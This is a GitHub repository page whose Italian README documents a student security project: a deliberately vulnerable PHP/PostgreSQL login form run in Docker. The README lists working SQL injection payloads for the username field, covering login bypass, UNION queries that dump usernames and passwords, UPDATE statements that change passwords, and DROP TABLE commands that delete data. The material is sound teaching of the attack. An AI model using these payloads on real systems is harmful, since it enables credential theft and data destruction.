Skip to content

pgnsamu/SQLInjection

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits
Relazione
Relazione
 
 
db
db
 
 
web
web
 
 
.DS_Store
.DS_Store
 
 
README.md
README.md
 
 
docker-compose.yml
docker-compose.yml
 
 

Repository files navigation

SQLInjection

Progetto SQL Injection - Sicurezza Informatica

Questo progetto dimostra come un'applicazione web vulnerabile possa essere soggetta ad attacchi di tipo SQL Injection.

Architettura

Il progetto è composto da:

  • Web server: PHP 7.4 + Apache
  • Database server: PostgreSQL 14 (postgres:14)
  • Docker Compose per gestire entrambi i container.

Struttura del progetto

SQLInjection/
├── docker-compose.yml
├── web/
│   ├── Dockerfile
│   ├── index.php
└── db/
    └── init.sql
  • docker-compose.yml: definisce i container.
  • web/Dockerfile: costruisce il web server con PHP e estensione pgsql.
  • web/index.php: pagina vulnerabile che permette SQL Injection.
  • db/init.sql: script SQL per creare il database iniziale.

Comandi utilizzati

Preparazione ambiente

  1. Creare la struttura delle cartelle:

    mkdir -p web db
touch docker-compose.yml web/Dockerfile web/index.php db/init.sql

  2. Scrivere i file come indicato sopra.

  3. Avviare l'ambiente:

    docker compose up --build

  4. Accedere all'applicazione:

Comandi utili aggiuntivi

  • Per spegnere i container:

    docker compose down

  • Per ricostruire tutto da capo:

    docker compose up --build

Accedere al DB

Comando iniziale: docker exec -it db psql -U user -d mydb Visualizzare tabelle: \dt Visualizzare contenuto tabella users: SELECT * FROM users;

Tecniche di attacco utilizzate

  • Tautologia: ' OR '1'='1' --
  • Commento di fine riga: ' --
  • Query Piggybacked: sarà dimostrato successivamente.

Tipi di violazione dimostrati

  • Confidenzialità: Accesso non autorizzato ai dati.
  • Integrità: Modifica dei dati (da dimostrare).
  • Disponibilità: Cancellazione tabelle (da dimostrare).

Note importanti

  • È fondamentale che -- sia seguito da uno spazio per funzionare correttamente come commento SQL.
  • Il progetto è progettato su Mac con architettura ARM64.
  • Le versioni dei container sono state scelte per garantire la compatibilità.
  • In PostgreSQL, i nomi delle tabelle e colonne sono case sensitive se creati con virgolette.
  • Per esplorare correttamente information_schema, è utile filtrare per table_schema='public'.

Trovare il numero di colonne in una tabella

Usare il seguente metodo incrementando il numero dopo ORDER BY per scoprire quante colonne ci sono:

' ORDER BY 1-- 
' ORDER BY 2-- 
' ORDER BY 3-- 
...
' ORDER BY 999--

Esempi di attacchi SQL Injection

Scoperta della struttura del database

Conoscere il nome delle tabelle

  • Campo Username:

    ' UNION SELECT NULL, table_name, NULL FROM information_schema.tables WHERE table_schema='public' --

  • Campo Password: qualsiasi valore (ignorato)

Conoscere le colonne di una tabella specifica (es. users)

  • Campo Username:

    ' UNION SELECT NULL, column_name, NULL FROM information_schema.columns WHERE table_name='users' --

  • Campo Password: qualsiasi valore (ignorato)

Esfiltrazione dati dal database

Ottenere username (limite del form PHP)

  • Campo Username:

    ' UNION SELECT id, username, password FROM users --

  • Campo Password: qualsiasi valore (ignorato)

Ottenere tutti i dati concatenati in una tabella (es. users)

  • Campo Username:

    ' UNION SELECT NULL, username || ' | ' || password || ' | ID: ' || id, NULL FROM users --

  • Campo Password: qualsiasi valore (ignorato)

Ottenere dati da un'altra tabella (es. orders)

  • Campo Username:

    ' UNION SELECT NULL, user_id || ' | ' || order_id || ' | order_date: ' || order_date, NULL FROM orders --

  • Campo Password: qualsiasi valore (ignorato)

Modifica dati

Modificare dati in una riga della tabella

  • Campo Username:

    admin'; UPDATE orders SET order_id='500000' WHERE user_id='1'; -- 

    admin'; UPDATE users SET password='hacked' WHERE username='user1'; --

  • Campo Password: qualsiasi valore (ignorato)

Eliminazione tabelle

Eliminazione tabella senza Foreign Key

  • Campo Username:

    admin' ; DROP TABLE users; --

  • Campo Password: qualsiasi valore (ignorato)

Eliminazione tabella con Foreign Key puntata da altre tabelle

  • Campo Username:

    admin' ; DROP TABLE users CASCADE; --

  • Campo Password: qualsiasi valore (ignorato)

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages